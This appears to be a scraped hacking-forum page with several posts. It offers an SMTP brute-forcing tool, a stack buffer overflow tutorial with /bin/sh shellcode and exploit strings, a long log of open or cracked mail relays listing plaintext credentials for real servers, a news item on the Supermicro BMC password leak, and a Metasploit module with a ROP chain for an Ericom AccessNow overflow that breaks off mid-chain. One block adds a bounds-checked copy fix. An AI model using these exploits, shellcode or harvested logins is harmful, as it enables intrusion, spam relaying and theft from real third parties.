secure-edf provide tools for web application articles & videos check xssya xss - cross site scripting scanner and vulnerability confirmation
  17. Author: Ar3s

Content:

connection_fix.reg
log-valid.txt
SMTP-Error-Log.txt
ip.txt
SmtpBruter.exe
test1
keys.txt
wordlist.txt

Virustotal

Run it in a virtual machine.

Download: http://uppit.com/uod04irry320/SMTP_BRUTER.RAR

Requires .NET Framework 4 ...
  18. Prerequisites:

• Basic/Intermediate knowledge of Assembly Language
• Basic/Intermediate knowledge of GDB (GNU Debugger), which is the debugger I will be using for this tutorial
• A good understanding of the C/C++ Languages
• A good understanding of how the stack is ordered and processed in a computer

Introduction:

A Buffer Overflow is a vulnerability which is encountered when a program writing data to a buffer exceeds the bounds of the buffer, causing the excess data to overflow into adjacent memory.

Picture this: we have created a C program in which we have initialized a variable, buffer, of type char, with a buffer size of 500 bytes:

```c
int main(void)
{
    char buffer[500];
}
```

And in this program, we take input from the command line, which is then copied to a buffer via the C function strcpy().

```c
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[500];
    strcpy(buffer, argv[1]);   /* no length check: this is the bug */
}
```

Notice that we have not checked whether or not the length of argv[1] is within the buffer's range of 500 bytes. Why not? Well, you'd think that, like most modern day programming languages, the strcpy() function would check this before copying the data to the buffer? This is not the case, and is a common misconception made by novice programmers who are not aware of the security implications regarding certain functions, which is why this vulnerability exists and may continue to exist further into the future.

Now, you may be wondering how you could possibly exploit such a vulnerability. I mean, what good is writing a few bytes into memory? Well, on its own, nothing, but if you were to overwrite the return pointer of the function which you are within, you could ultimately alter the flow of code execution within the program that you are targeting.
For example, in the program above, say that theoretically the memory location of buffer starts at 0x00000000, and ends at 0x0000007D (which should have 500 bytes of space), and that the return pointer is located 524 Bytes away from that. It would take an input of 1024 Bytes, e.g. 1024 "A"'s, to get "behind" the return pointer, which means that you can then overwrite the next 4 bytes of memory defined as the return pointer, and then watch as it is POP'ed into the EIP register, and executes whatever code, malicious or otherwise, which may lie on the other end address you specify.

Now we get on to the really fun bit, where we actually get to exploit a program which is susceptible to this exploit vector.

If you are going to attempt this on your own computer, firstly, make sure you are NOT using Windows >= Vista, as Windows >= Vista have protections in place, such as ESP (Executable Space Protection), ASLR (Address Space Layout Randomization), and various other exploit prevention techniques. It would be more advisable to use operating systems such as Linux, Unix, and other Unix based operating systems to get this working, as it's easier to disable the countermeasures put in place by running a command such as:

```sh
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
```

Which will disable your system's ASLR until you reboot, which is not an option in Windows operating systems (that I'm aware of).

If you do not have access to a Linux operating system, or are too lazy to dual boot or install a VM, you can SSH into various wargaming servers (such as Smash The Stack or Over The Wire) to practice the skills learned here in a legal and safe way, with minimalistic effort, for all you lazy h4xx0rs out there.

Now, on with thy spl0itz.

I'm going to use a simple source code from Smash The Stack : Blowfish, which does not currently have a webpage.
Here is the code:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buf[256];

    if (argc == 1) {
        printf("Usage: %s input\n", argv[0]);
        exit(1);
    }
    strcpy(buf, argv[1]);   /* unchecked copy: the vulnerability under study */
    printf("%s", buf);
}
```

As you can see, it follows the same principles as the example code used previously in the tutorial, but with some extra validation to make sure that argv[1] is present.

So, let's compile this code and continue. In this tutorial, I'm going to use GCC (GNU C Compiler) from the GNU Compiler Collection to compile my code. I will compile using the following command:

```sh
gcc bof.c -g -fno-stack-protector -o bof
```

Which will compile the code with required headers for gdb to be able to debug it, and also disable gcc's stack protection in systems which have patched gcc to have it enabled by default.

Once we have compiled our vulnerable code, we can open the executable, which I have called "bof", with GDB, for debugging, using the command:

```sh
gdb bof
```

Which should give you something similar to this:

Now that we are in GDB, we can start getting into the real exploitation. Firstly, we want to make sure that we can run the executable correctly from GDB. We can do this simply by typing "run", which should return:

If it returns an error instead, then try moving to a folder where you have sufficient permissions.

Assuming that the program executes, then exits normally, we can carry on. We now need to establish how many bytes we have to enter until we have control over the return pointer. There are two main ways to do this:

• Trial and error, or
• A string which never repeats a sequence of bytes, allowing for easy identification

I tend to just use trial and error, as the second option requires the Metasploit Framework, which may not be available on machines such as the ones you will encounter while wargaming.

```
run $(perl -e 'print "A" x 512')
```

which for me causes a segmentation fault, which occurs when EIP is set to an address which cannot be executed, or is outside of the available memory for the program.
So, now that we know the return pointer resides within 512 bytes of the start of our buffer, we can start to slowly decrement the amount of "A"'s that we print, until the program executes without error, and returns "Program Exited Normally.", which for me occurs at 268 Bytes, which is only 12 Bytes away from the end of our buffer. This means that the return pointer lies between 268 Bytes and 273 Bytes.

Armed with this knowledge, we can move on to adding in our shellcode, which is comprised of the opcodes of Assembly instructions. The shellcode I will be using for this tutorial is a /bin/sh shellcode written by a fairly recently retired member of SoldierX, jip, which will drop you into a bash shell which has the permissions of the program you are attacking. Here it is:

```
\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
```

So, what do we do now? Well, we have to incorporate this into our exploit. We do this by first adding the shellcode into the Perl string, giving us this bash / Perl code. So, for trial and error, we want to type run:

```
run $(perl -e 'print "A" x 268 . "\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"')
```

And then we must take away the amount of Bytes the shellcode contains from the overall amount of "A"'s (or whatever filler you are using), so that we still retain control over the return pointer. In order to do this, we must replace the number "268" with "(268 - 26)", where 26 is the amount of Bytes in the shellcode (every 2 Bytes in the shellcode equates to one Byte in Hex; the "\x" signifies the following 2 Bytes are a hexadecimal Byte). This will give us this code:

```
run $(perl -e 'print "A" x (268 - 26) . "\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"')
```

This command on its own will not actually give us a working exploit; for that, we need to find out the address of where our shellcode is stored. But before we get into the nitty gritty with Assembly Language, I want to make 2 more adjustments to our current exploit:

• A nop sled
• An address "placeholder", as the longer or shorter the exploit is, the more the memory allocations shift around. By giving us a placeholder, we are securing a permanent place in memory

The altered code will look like this:

```
run $(perl -e 'print "\x90" x (268 - 26) . "\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\xff\xff\xff\xff"')
```

Now we've got an almost working exploit. All we have to do now is find that memory address. To do that, we have to run "disas main", which will give us the following result:

This is where you will need to have some knowledge of Assembly to get through.

As you can see, we have a full dump of the program's Assembly code; so, what do we do with it? Well, first, we have to look for the call to strcpy(), which should be pretty easy, as it's marked in the Assembly code as "strcpy@plt". So once we know where the strcpy() is called, we can set a break point to pause before it is called, and examine the stack. To do this, run the command "break *main+79". Run the program again, and we should get something like:

which signifies that the program is waiting at the specified breakpoint. We now want to examine the top two pointers on the stack, which are the arguments which will be passed to the strcpy() function. To do this we type "x/2x $esp", which will give us:

The two addresses after the colon are the addresses that we are interested in.
To view what data they hold, we have to type "x/s 0xbfffd6d0", which will give us:

Which is clearly not our shellcode, so this must be the buffer before we have written to it. So, if we type "x/s 0xbfffd974", we should see our shellcode.

Hmm.. Well that's odd.. No shellcode. Oh yeah, it's further down, past the Nops. Press enter once and we should see it.

That's it! We know where our shellcode is stored, so now we can take the address "0xbfffd974" and substitute it right into the exploit.. right? Nope, we must swap the byte order around due to a "phenomenon" known as Little Endian byte order, which causes byte orders to switch around inside addresses.

So, we switch around the Bytes to give us "74 d9 ff bf", which then need to have "\x" prepended, as they are hex bytes, which will give us "\x74\xd9\xff\xbf". This can now be substituted into our exploit to give us the Perl code:

```
run $(perl -e 'print "\x90" x (268 - 26) . "\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x74\xd9\xff\xbf"')
```

Which, when run, should give us a shell (note that sometimes GDB does not have the permissions required, so you should run it outside GDB, by typing "quit", then replacing "run" with the name of the binary):

WE DID IT!

From now on, you will have a shell in the specified application (until you choose to quit)! Once you do quit, however, the program will crash, and most likely cause Denial Of Service in programs such as web servers, which are responsible for serving data to clients.
I'm not going to cover how to alter the flow of execution so that the program continues to function correctly, as this is meant to be a tutorial explaining the basics of the buffer overflow, how the concept works and is exploited. So, that is the end of my Buffer Overflow Exploitation tutorial. I hope that you learned how to exploit buffer overflows quickly and easily (if not, feel free to pm me with any questions or problems and I'll make sure to get back to you). Thanks a lot.

Author: xAMNESIAx

Source
      • 2
      • Upvote
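The length check that the tutorial above points out is missing before strcpy(), shown as an added example that is not part of the original post. The names copy_checked, handle_input, try_length and struct frame, and the guard value, are assumptions made for this illustration; the buffer size and the 268 and 512 byte inputs are the ones the tutorial uses.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 256          /* same size as buf[] in the tutorial's program */
#define GUARD    0xC0FFEE42u  /* constructed marker standing in for adjacent stack data */

/* Demonstration layout only: a marker placed directly after the buffer. */
struct frame {
    char buf[BUF_SIZE];
    unsigned int guard;
};

/*
 * Bounded replacement for strcpy(buf, argv[1]).
 * Returns 0 and leaves a NUL-terminated copy in dst on success.
 * Returns -1 and leaves dst empty when src plus its terminator does not fit;
 * over-long input is rejected rather than silently truncated.
 */
int copy_checked(char *dst, size_t dst_size, const char *src)
{
    const char *end;
    size_t len;

    if (dst == NULL || dst_size == 0)
        return -1;
    dst[0] = '\0';
    if (src == NULL)
        return -1;

    /* Look for the terminator within the first dst_size bytes only. */
    end = memchr(src, '\0', dst_size);
    if (end == NULL)
        return -1;                 /* src needs more than dst_size bytes */

    len = (size_t)(end - src);
    memcpy(dst, src, len + 1);     /* len + 1 <= dst_size is guaranteed here */
    return 0;
}

/* Hardened counterpart of the tutorial's main(); returns the exit status. */
int handle_input(int argc, char *argv[], struct frame *f)
{
    if (argc < 2) {
        fprintf(stderr, "Usage: %s input\n", argc > 0 ? argv[0] : "bof");
        return 2;
    }
    if (copy_checked(f->buf, sizeof f->buf, argv[1]) != 0) {
        fprintf(stderr, "input too long (max %d bytes)\n", BUF_SIZE - 1);
        return 1;
    }
    printf("%s\n", f->buf);
    return 0;
}

/* Feeds n 'A' bytes to handle_input; reports its status and whether the guard survived. */
int try_length(size_t n, int *guard_intact)
{
    struct frame f;
    char prog[] = "bof";
    char *argv[3];
    char *arg = malloc(n + 1);
    int rc;

    if (arg == NULL)
        return -1;
    memset(arg, 'A', n);
    arg[n] = '\0';
    argv[0] = prog;
    argv[1] = arg;
    argv[2] = NULL;

    f.guard = GUARD;
    rc = handle_input(2, argv, &f);
    *guard_intact = (f.guard == GUARD);
    free(arg);
    return rc;
}

int main(void)
{
    /* 255 is the longest input that fits; 268 and 512 are the tutorial's lengths. */
    size_t lengths[] = { 255, 256, 268, 512 };
    size_t i;

    for (i = 0; i < sizeof lengths / sizeof lengths[0]; i++) {
        int intact = 0;
        int rc = try_length(lengths[i], &intact);
        fprintf(stderr, "%lu bytes -> status %d, guard %s\n",
                (unsigned long)lengths[i], rc, intact ? "intact" : "overwritten");
    }
    return 0;
}
```

Building the real program without `-fno-stack-protector` and leaving ASLR enabled adds further layers, but the bounded copy is what removes the overflow itself.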
| Blacklist: Not Listed | Time: 23.06.2014 - 04:29:34 212.18.28.65:25 | no auth | SSL: False | Hostname: host-212-18-28-65.customer.m-online.net | Inbox: False | Blacklist: Not Listed | Time: 23.06.2014 - 06:54:31 176.9.252.213:465 | no auth | SSL: True | Hostname: static.213.252.9.176.clients.your-server.de | Inbox: True | Blacklist: Listed | Time: 23.06.2014 - 03:13:49 195.243.87.34:25 | no auth | SSL: False | Hostname: x2007srv.tek-service.de | Inbox: True | Blacklist: Listed | Time: 23.06.2014 - 01:32:50 176.94.124.189:25 | test@g-g-g.de : test | SSL: False | Hostname: mail.g-g-g.de | Inbox: True | Blacklist: Listed | Time: 23.06.2014 - 04:54:31 Hostname: beta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 18:03:35 212.77.224.118:465 | no auth | SSL: True | Hostname: beta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 18:13:08 212.77.224.119:465 | no auth | SSL: True | Hostname: beta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 17:28:19 212.77.224.121:465 | no auth | SSL: True | Hostname: beta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 18:22:45 212.77.224.122:465 | no auth | SSL: True | Hostname: beta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 17:48:25 212.77.224.123:465 | no auth | SSL: True | Hostname: beta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 18:17:23 212.77.224.124:465 | no auth | SSL: True | Hostname: beta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 18:01:27 212.77.224.125:465 | no auth | SSL: True | Hostname: beta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 17:51:49 212.77.224.126:465 | no auth | SSL: True | Hostname: beta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 17:53:43 212.77.225.2:465 | no auth | SSL: True | Hostname: ns8.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 18:27:08 212.77.225.102:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: 
True | Blacklist: Unknown | Time: 23.06.2014 - 18:38:44 212.77.225.160:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 18:46:36 212.77.225.164:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 19:17:55 212.77.225.163:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 19:14:44 212.77.225.161:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 19:12:48 212.77.225.170:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 18:53:15 212.77.225.166:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 19:00:02 212.77.225.223:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 19:19:46 212.77.225.221:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 20:21:58 212.77.225.224:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 19:45:30 212.77.226.3:465 | no auth | SSL: True | Hostname: ns6.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 19:33:59 212.77.226.7:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 20:26:15 212.77.226.6:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 19:39:19 212.77.226.4:465 | no auth | SSL: True | Hostname: ns2.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 19:41:05 212.77.226.9:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 20:44:09 212.77.226.8:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: True | Blacklist: Unknown | Time: 
23.06.2014 - 20:57:14 212.77.226.13:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 20:46:38 212.77.224.32:465 | no auth | SSL: True | Hostname: saturn.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 20:59:08 212.77.224.117:465 | no auth | SSL: True | Hostname: beta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 21:13:26 212.77.224.112:465 | no auth | SSL: True | Hostname: beta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 21:16:44 212.77.224.113:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 21:27:12 212.77.227.195:465 | no auth | SSL: True | Hostname: 227-195-ip.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 21:29:35 212.77.228.5:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 21:43:41 212.77.228.42:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 21:50:42 212.77.228.51:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 21:55:28 212.77.228.49:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:27 212.77.228.47:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:28 212.77.228.41:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:28 212.77.228.43:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:29 212.77.228.44:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:29 212.77.228.45:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:29 
212.77.228.56:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:31 212.77.228.59:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:32 212.77.228.54:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:32 212.77.228.57:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:33 212.77.228.53:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:33 212.77.228.58:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:34 212.77.228.89:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:40 212.77.228.88:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:41 212.77.228.98:465 | no auth | SSL: True | Hostname: 98-ip.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:43 212.77.228.99:465 | no auth | SSL: True | Hostname: 99-ip.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:45 212.77.225.165:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:28:04 212.77.225.169:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:28:08 212.77.225.168:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:28:08 212.77.225.167:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:28:09 212.77.225.222:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:28:25 
212.77.225.233:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:28:26 212.77.226.5:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:28:31 212.77.226.10:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:28:34 212.77.226.12:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:28:34 212.77.226.11:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:28:34 212.77.228.48:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Not Listed | Time: 23.06.2014 - 17:29:36 212.77.228.46:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:30:40 212.77.228.50:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:30:42 212.77.228.52:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:30:43 212.77.228.131:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:30:57 212.77.228.132:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:30:57 212.77.228.40:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Not Listed | Time: 23.06.2014 - 17:31:06 212.77.232.3:465 | no auth | SSL: True | Hostname: 3-ip.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:32:04 212.77.228.55:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Not Listed | Time: 23.06.2014 - 17:32:20 212.77.232.2:465 | no auth | SSL: True | Hostname: 2-ip.omc.net | Inbox: False | Blacklist: Not Listed | Time: 23.06.2014 - 17:33:30 
95.90.48.101:25 | no auth | SSL: False | Hostname: 95-90-48-101-dynip.superkabel.de | Inbox: False | Blacklist: Listed | Time: 23.06.2014 - 18:09:51 176.9.206.202:587 | user@mofep.gov.gh : user | SSL: True | Hostname: br2.cyterrasolutions.com | Inbox: True | Blacklist: Listed | Time: 23.06.2014 - 20:45:25 176.9.22.85:465 | sales@gelatineelamin.com : sales | SSL: True | Hostname: static.85.22.9.176.clients.your-server.de | Inbox: True | Blacklist: Listed | Time: 23.06.2014 - 17:56:02 inbox: 176.9.113.197:25 | test@microcosmosrecords.com : test | SSL: True | Hostname: static.197.113.9.176.clients.your-server.de | Inbox: True | Blacklist: Listed | Time: 25.06.2014 - 05:49:33 176.9.142.211:465 | test@pmonly.com : 1234567 | SSL: True | Hostname: s7.webhost1.ru | Inbox: True | Blacklist: Listed | Time: 25.06.2014 - 08:09:09 217.5.204.250:465 | admin@fag-badsteben.de : admin | SSL: True | Hostname: mail.fag-badsteben.de | Inbox: True | Blacklist: Listed | Time: 25.06.2014 - 18:48:35 77.68.61.32:465 | no auth | SSL: True | Hostname: server77-68-61-32.live-servers.net | Inbox: True | Blacklist: Listed | Time: 26.06.2014 - 03:16:57 77.68.61.33:465 | no auth | SSL: True | Hostname: server77-68-61-33.live-servers.net | Inbox: True | Blacklist: Listed | Time: 26.06.2014 - 03:21:53 217.7.191.196:587 | no auth | SSL: True | Hostname: SERVER1 | Inbox: True | Blacklist: Listed | Time: 26.06.2014 - 05:33:03
  20. ANTI-HACKER TOOL KIT, Fourth Edition Author: Mike Shema Download: http://www.scribd.com/doc/231392575/Anti-Hacker-Tool-Kit-4th-Edition
  21. Exploiting bug in Supermicro hardware is as easy as connecting to port 49152.

      An alarming number of servers containing motherboards manufactured by Supermicro continue to expose administrator passwords despite the release of an update that patches the critical vulnerability, an advisory published Thursday warned.

      The threat resides in the baseboard management controller (BMC), a motherboard component that allows administrators to monitor the physical status of large fleets of servers, including their temperatures, disk and memory performance, and fan speeds. Unpatched BMCs in Supermicro motherboards contain a binary file that stores remote login passwords in clear text. Vulnerable systems can be detected by performing an Internet scan on port 49152. A recent query on the Shodan search engine indicated there are 31,964 machines still vulnerable, a number that may not include many virtual machines used in shared hosting environments.

      "This means at the point of this writing, there are 31,964 systems that have their passwords available on the open market," wrote Zachary Wikholm, a senior security engineer with the CARInet Security Incident Response Team. "It gets a bit scarier when you review some of the password statistics. Out of those passwords, 3,296 are the default combination. Since I'm not comfortable providing too much password information, I will just say that there exists a subset of this data that either contains or just was 'password.'"

      A separate blog post from security training institute Sans confirmed the contents of the advisory.

      "The vulnerability involves a plaintext password file available for download simply by connecting to the specific port, 49152," it stated. "One of our team has tested this vulnerability, and it works like a champ, so let’s add another log to the fire and spread the good word."

      Other researchers chimed in with tweets such as:

      Wikholm said the Supermicro patch requires vulnerable motherboards to be "flashed" with new firmware, a process that's not feasible for many production servers. An alternative workaround involves establishing a secure shell connection to a vulnerable device and disabling all universal plug and play processes. While effective, the fix lasts only until the system is disconnected from a power source, making it possible for the vulnerability to be resurrected.

      Thursday's advisory comes 10 months after security researchers warned that as many as 100,000 Internet-connected servers sold by Dell, HP, and other large manufacturers contained BMCs that were vulnerable to remote hack attacks that steal passwords and install malware on their host systems. Those vulnerabilities were contained in the intelligent platform management interface, a protocol implemented in various BMCs.

      Via
  22. Ericom AccessNow Server Buffer Overflow

      metasploit.com, temp66, 2014-06-19

```ruby
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ericom AccessNow Server Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack based buffer overflow in Ericom AccessNow Server. The
        vulnerability is due to an insecure usage of vsprintf with user controlled data,
        which can be triggered with a malformed HTTP request. This module has been tested
        successfully with Ericom AccessNow Server 2.4.0.2 on Windows XP SP3 and Windows 2003
        Server SP2.
      },
      'Author'         =>
        [
          'Unknown', # Vulnerability Discovery
          'juan vazquez', # Metasploit Module
        ],
      'References'     =>
        [
          ['ZDI', '14-160'],
          ['CVE', '2014-3913'],
          ['BID', '67777'],
          ['URL','http://www.ericom.com/security-ERM-2014-610.asp']
        ],
      'Privileged'     => true,
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'Payload'        =>
        {
          'Space'          => 4096,
          'BadChars'       => "\x00\x0d\x0a",
          'DisableNops'    => true,
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
      'Targets'        =>
        [
          [ 'Ericom AccessNow Server 2.4.0.2 / Windows [XP SP3 / 2003 SP2]',
            {
              'RopOffset' => 62,
              'Offset'    => 30668,
              'Ret'       => 0x104da1e5 # 0x104da1e5 {pivot 1200 / 0x4b0} # ADD ESP,4B0 # RETN # From AccessNowAccelerator32.dll
            }
          ]
        ],
      'DisclosureDate' => 'Jun 2 2014',
      'DefaultTarget'  => 0))

    register_options([Opt::RPORT(8080)], self.class)
  end

  def check
    res = send_request_cgi({
      'uri' => '/AccessNow/start.html'
    })

    unless res && res.code == 200 && res.headers['Server']
      return Exploit::CheckCode::Safe
    end

    if res.headers['Server'] =~ /Ericom AccessNow Server/
      return Exploit::CheckCode::Appears # Ericom AccessNow 2.4
    elsif res && res.code == 200 && res.headers['Server'] && res.headers['Server'] =~ /Ericom Access Server/
      return Exploit::CheckCode::Detected # Ericom AccessNow 3
    end

    Exploit::CheckCode::Unknown
  end

  def exploit_uri
    uri = "#{rand_text_alpha(1)} " # To ensure a "malformed request" error message
    uri << rand_text(target['RopOffset'])
    uri << create_rop_chain
    uri << payload.encoded
    uri << rand_text(target['Offset'] - uri.length)
    uri << rand_text(4) # nseh
    uri << [target.ret].pack("V") # seh

    uri
  end

  def exploit
    print_status("#{peer} - Sending malformed request...")
    send_request_raw({
      'method' => 'GET',
      'uri'    => exploit_uri,
      'encode' => false
    }, 1)
  end

  def create_rop_chain
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets =
      [
        0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure it works in both windows 2003 SP2 and XP SP3
        0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure it works in both windows 2003 SP2 and XP SP3
        0x10518866, # POP EAX # RETN [AccessNowAccelerator32.dll]
        0x105c6294, # ptr to &VirtualAlloc() [IAT AccessNowAccelerator32.dll]
        0x101f292b, # MOV EAX,DWORD PTR DS:[EAX] # RETN [AccessNowAccelerator32.dll]
        0x101017e6, # XCHG EAX,ESI # RETN [AccessNowAccelerator32.dll]
        0x103ba89c, # POP EBP # RETN [AccessNowAccelerator32.dll]
        0x103eed74, # & jmp esp [AccessNowAccelerator32.dll]
        0x1055dac2, # POP EAX # RETN [AccessNowAccelerator32.dll]
        0xffffffff, # Value to negate, will become 0x00000001
        0x1052f511, # NEG EAX # RETN [AccessNowAccelerator32.dll]
        0x10065f69, # XCHG EAX,EBX # RETN [AccessNowAccelerator32.dll]
        0x10074429, # POP EAX # RETN [AccessNowAccelerator32.dll]
        0xfbdbcb75, # put delta into eax (-> put 0x00001000 into edx)
        0x10541810, # ADD EAX,424448B # RETN [AccessNowAccelerator32.dll]
        0x1038e58a, # XCHG EAX,EDX # RETN [AccessNowAccelerator32.dll]
        0x1055d604, # POP EAX # RETN [AccessNowAccelerator32.dll]
        0xffffffc0, # Value to negate, will become 0x00000040
        0x10528db3, # NEG EAX # RETN [AccessNowAccelerator32.dll]
